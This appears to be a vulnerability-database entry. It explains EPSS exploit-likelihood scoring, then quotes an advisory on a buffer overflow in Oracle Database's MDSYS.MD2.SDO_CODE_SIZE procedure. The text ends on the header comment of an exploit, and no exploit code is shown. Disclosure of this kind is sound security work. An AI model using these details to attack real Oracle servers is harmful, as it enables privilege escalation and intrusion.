EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/13145/info Oracle Database is reported prone to a buffer overflow vulnerability. Reportedly this issue affects the 'MDSYS.MD2.SDO_CODE_SIZE' procedure. An attacker can supply excessive data to an affected routine resulting in overflowing a destination buffer. This issue can be leveraged to execute arbitrary code and gain 'SYSDBA' privileges. It is conjectured that authentication is required to carry out an attack. This BID will be updated when more information is available. /* Advanced SQL Injection in Oracle databases Exploit for the buffer overflow vulnerability in procedure MDSYS.MD2.SDO_CODE_SIZE of Oracle Database Server version 10.1.0.2 under Windows 2000 Server SP4.
